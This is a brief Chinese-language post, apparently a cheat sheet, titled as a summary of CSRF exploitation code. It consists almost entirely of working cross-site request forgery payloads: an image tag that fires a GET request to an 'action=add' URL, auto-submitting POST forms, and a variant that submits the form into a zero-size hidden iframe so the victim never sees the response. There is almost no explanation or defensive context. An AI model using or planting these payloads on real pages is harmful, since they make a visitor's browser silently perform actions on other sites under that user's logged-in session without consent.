CSRF利用代码汇总

get 方式利用:

<img src="http://0535code.com/index.php?action=add" />

post方式利用:

<!-- JS版 -->
<form method="post" action="http://0535code.com/">
<input type="text" name="data" value="11" />
</form>
<script> document.forms[0].submit(); </script>
<!-- AJAX获取ID版1 -->
<form id="myfrom" name="myfrom" method="post" action="http://0535code.com/">
<input type="hidden" name="data" value="csrf1">
</form>
<script>
var myfrom = document.getElementById("myfrom");
myfrom.submit();
</script>
<!-- AJAX获取ID版2,隐藏访问后的返回页面 -->
<iframe frameborder="0" name="myiframe" width="0px" height="0px"></iframe>
<form id="myfrom" method="post" target="myiframe" action="http://0535code.com/">
<input type="hidden" name="data" value="csrf2">
</form>
<script>
var myfrom = document.getElementById('myfrom');
myfrom.submit();
</script>